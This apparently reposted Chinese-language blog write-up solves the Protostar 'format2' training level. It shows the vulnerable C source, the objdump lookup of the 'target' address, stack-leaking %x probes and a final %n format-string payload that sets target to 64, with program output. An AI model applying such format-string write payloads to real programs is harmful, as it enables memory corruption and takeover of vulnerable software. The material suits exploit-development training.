溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Protostar format2

發(fā)布時間:2020-07-07 15:06:38 來源:網(wǎng)絡(luò) 閱讀:505 作者:terrying 欄目:安全技術(shù)

About

This level moves on from format1 and shows how specific values can be written in memory.
This level is at /opt/protostar/bin/format2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if(target == 64) {
    printf("you have modified the target :)\n");
} else {
    printf("target is %d :(\n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}

這題與上題有點區(qū)別:1、傳參改為fgets;2、target=64
同樣需要找到target的位置
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
080496e4 g         O .bss     00000004                            target

同樣先找出賦值動作的位置:
user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa"+"%x."*150' | ./format2
aaaaaaaa200.b7fd8420.bffff624.61616161.61616161.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.a2e78.b7eada75.b7fd7ff4.80496b0.bffff7c8.8048338.b7ff1040.80496b0.bffff7f8.80484f9.b7fd8304.b7fd7ff4.80484e0.bffff7f8.b7ec6365.b7ff1040.bffff7f8.80484c6.80484e0.0.bffff878.b7eadc76.1.bffff8a4.bffff8ac.b7fe1848.bffff860.ffffffff.b7ffeff4.8048285.1.bffff860.b7ff0626.
target is 0 :(

nice,這次很近。同樣確認一下位置:
user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa%x%x%x%x"' | ./format2
aaaaaaaa200b7fd8420bffff62461616161
target is 0 :(
按照上一題的做法看看會發(fā)生什么事情 :
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%x%x%x%n"' | ./format2
aaaa200b7fd8420bffff624
target is 27 :(
OK,這里已經(jīng)成功更改了target的值了,題目要求是64,只需要將%x固定長度輸出即可:
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%40x%x%x%n"' | ./format2
aaaa                                                                         200b7fd8420bffff624
you have modified the target :)




向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI